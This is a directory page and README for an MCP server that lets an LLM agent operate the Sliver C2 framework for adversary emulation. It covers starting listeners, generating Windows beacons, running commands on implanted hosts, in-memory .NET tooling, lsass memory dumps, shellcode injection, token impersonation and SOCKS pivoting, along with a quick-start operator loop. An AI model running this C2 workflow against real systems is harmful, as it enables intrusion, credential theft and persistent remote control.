sliver-mcp
Sliver MCP exposes the full Sliver C2 operator workflow as MCP tools, enabling an LLM agent to conduct end-to-end adversary emulation against authorized infrastructure.
Connection & State Management
Connect/disconnect to a Sliver team server, check health/version, and drain async event queues.
Listener Management
Start/stop C2 listeners (HTTPS, HTTP, mTLS, DNS, WireGuard), list active jobs, and kill listeners by job ID.
Implant & Beacon Generation
Build session-mode implants (interactive, low-latency) or beacon-mode implants (async check-in with configurable intervals/jitter) for Windows/Linux/macOS in various formats (exe, shellcode, shared lib, service).
List, regenerate, and remove prior builds and saved profiles; supports evasion/obfuscation and architecture targeting.
Session & Beacon Control
List, inspect, and kill active interactive sessions and async beacons.
Remote Execution
Execute binaries or shell commands on sessions/beacons with automatic target resolution and output capture.
Poll queued/completed beacon tasks.
File Operations
Navigate remote filesystems (
ls,pwd,cd,mkdir), transfer files (download/upload), and delete files/directories — destructive actions gated behindarm_dangerous().
Pivot Enumeration
List pivot listeners running on an active session.
Cross-Tool Handoff
Export structured C2 state (sessions, beacons, listeners, builds) for other tools (e.g., p0rtix, Metasploit MCP).
Ingest handoff data to automatically stand up matching listeners and beacons.
Safety & Noise Controls
Set a noise ceiling (
passive→green→yellow→red) to control permitted actions; tools above the ceiling are refused with a structured error, never silently downgraded.Arm dangerous mode explicitly to unlock RED-tier destructive tools.
Allows interaction with the Metasploit exploitation framework via structured handoff, enabling AI agents to pass C2 state (listeners, beacons, sessions) between systems for coordinated adversary emulation operations.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@sliver-mcplist all active sessions and beacons"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
███████╗██╗ ██╗██╗ ██╗███████╗██████╗ ███╗ ███╗ ██████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ ████╗ ████║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝████╗██╔████╔██║██║ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗╚═══╝██║╚██╔╝██║██║ ██╔═══╝
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ ██║ ╚═╝ ██║╚██████╗██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝
drive the Sliver C2 operator surface from an AI agent
A Model Context Protocol server for the
Sliver C2 framework. It exposes the Sliver operator
surface — listeners, implant/beacon generation, sessions and beacons, command execution, file
operations, and a structured handoff — as mcp__sliver__* tools an LLM agent can drive.
It is the C2 layer of the AI-offsec stack, built to slot in alongside the
p0rtix (recon) and p0cs (exploit staging and delivery) MCP servers
and orchestrated by the dagar-red skill system. It
mirrors their conventions: Python + FastMCP, async tools, structured-dict returns, and a
noise / arm_dangerous safety gate.
⚠️ Authorized use only. This drives a live C2 framework. Use it only against infrastructure you own or are explicitly authorized to test — owned labs, CTFs, and contracted engagements. It is built for adversary emulation: standing up realistic C2 so defenders can test and improve detection and response. The noise tiers and the
arm_dangerousgate exist to keep operation deliberate and in scope.
⚡ Quick start
# install
git clone git@github.com:v0idravl/sliver-mcp.git && cd sliver-mcp
python3 -m venv venv && ./venv/bin/pip install -e .
# register with Claude Code (see below), then in-agent:
connect() # attach to your team server
set_noise("yellow") # allow actions that touch a host
start_https_listener(port=443)
generate_beacon(c2_host="<redirector>", os="windows")
# … deliver the beacon, then …
poll_events(); list_sessions(); execute_command(id, "whoami")Requires Python ≥ 3.11 and a reachable Sliver team server with an operator config (.cfg).
See docs/live-test.md for standing up a local server and generating one.
Related MCP server: SSH MCP Server
🧠 How it relates to Sliver's built-in MCP
Sliver ships an experimental built-in MCP, but it is filesystem-only (≈11 tools: fs_ls,
fs_cat, fs_rm, …). sliver-mcp is a superset focused on the full operator workflow —
listeners, payload generation, sessions/beacons, execution, and cross-tool handoff — so an agent
can run an engagement end to end.
🔌 Register with Claude Code
Add to ~/.claude.json (or via claude mcp add). Point SLIVER_CONFIG at your operator config:
"sliver": {
"type": "stdio",
"command": "/home/youruser/projects/sliver-mcp/venv/bin/sliver-mcp",
"args": [],
"env": { "SLIVER_CONFIG": "/home/youruser/.sliver-client/configs/operator.cfg" }
}The server starts whether or not the team server is up — call connect() first; tools that need
a live client return a structured "not connected" error until it succeeds.
🧰 Tool surface (mcp__sliver__*)
Category | Tools | What they do |
Connection / state |
| attach to the team server, check health, drain the async event queue (new callbacks, task results) |
Listeners |
| stand up / tear down C2 listeners across protocols |
Implant generation |
| build session implants and async beacons; reuse profiles and prior builds; prune stale builds |
Sessions / beacons |
| enumerate and inspect callbacks; retire them |
Execution |
| run a binary / run a shell command on a session or beacon; poll a beacon's queued/completed tasks |
File operations |
| navigate and move files on the target |
Pivots |
| enumerate pivot listeners on a session |
Handoff |
| exchange C2 state with the rest of the stack |
Post-exploitation |
| run .NET assemblies in-memory (SharpHound, Rubeus, Seatbelt, etc.), inject shellcode into a process, enumerate processes, dump process memory (lsass), capture desktop screenshots, list network interfaces and active connections |
Token operations |
| create a token with supplied credentials, impersonate a token by PID, drop impersonation, run a command as another user, migrate implant to another process |
Registry |
| read and write registry key values |
Elevated |
| attempt SYSTEM elevation (requires |
SOCKS / Tunneling |
| SOCKS5 proxy via a session (auto-writes |
Engagement state |
| open/create a dagar-state SQLite engagement store; export current store as JSON |
Safety |
| raise the noise ceiling / unlock destructive actions |
🚦 Safety / noise model
Every tool carries a noise tier. A call above the current ceiling is refused with a structured reason — never silently downgraded.
Tier | Meaning | Examples |
| read-only state |
|
| build / stand up our own infra | listeners, |
| actions that touch the target |
|
| destructive |
|
The default ceiling is green: call set_noise("yellow") before running commands on a host
(the sliver-ops loop does this explicitly), and arm_dangerous() to unlock rm.
🔁 Typical loop
connect()
set_noise("yellow")
start_https_listener(port=443, domain="<redirector>")
generate_beacon(c2_host="<redirector>", os="windows", interval=60, jitter=30)
# … deliver the beacon — see docs/delivery.md for session-safe detachment …
poll_events() # watch for the callback
list_sessions()
execute_command(target_id, "whoami")
start_socks(session_id, 1080) # auto-writes proxychains.conf → p0rtix nmap tunnels through
export_handoff() # feed C2 state back to internal-dispatchBeacons vs sessions
execute and the file tools accept either a session id (interactive, low latency) or a
beacon id (asynchronous — the result returns after the next check-in, every interval ±
jitter seconds). Use poll_events() to watch for new callbacks and task completion.
For a beacon, if the next check-in does not arrive within SLIVER_TASK_TIMEOUT (default 300s),
execute / execute_command return a structured status instead of a bare timeout error:
task_state="queued" (the task is pending and will run on the next check-in, with next_checkin
timing) or task_state="dead" (the beacon is gone). Poll get_beacon_tasks(beacon_id) to see
whether a queued task has since been picked up.
dagar-state integration
When open_store(engagement) is called, sliver-mcp tracks sessions, routes, and privilege
escalations in a shared SQLite DB that p0rtix also writes to — so the full engagement picture
(hosts, services, creds, sessions) is queryable in one place.
⚠️ Known limitations (v1)
These reflect the current sliver-py surface, not the design:
No interactive PTY shell. A streaming PTY can't be a single request/response tool;
execute_commandcovers command execution.No
cp/chmod/chown— not in sliver-py's base command set. Planned once upstream exposes them.
🩹 Troubleshooting
Symptom | Fix |
Every tool returns "not connected" | Call |
| Check |
A call is "refused: above noise ceiling" | Raise it deliberately: |
No callback after delivery |
|
🧪 Tests
./venv/bin/pip install -e '.[dev]'
./venv/bin/pytest # 64 tests, no live server requiredThe suite mocks sliver-py, so it is green on a clean machine. For a live end-to-end smoke test,
see docs/live-test.md.
License
MIT. See LICENSE.
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Latest Blog Posts
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/v0idravl/sliver-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server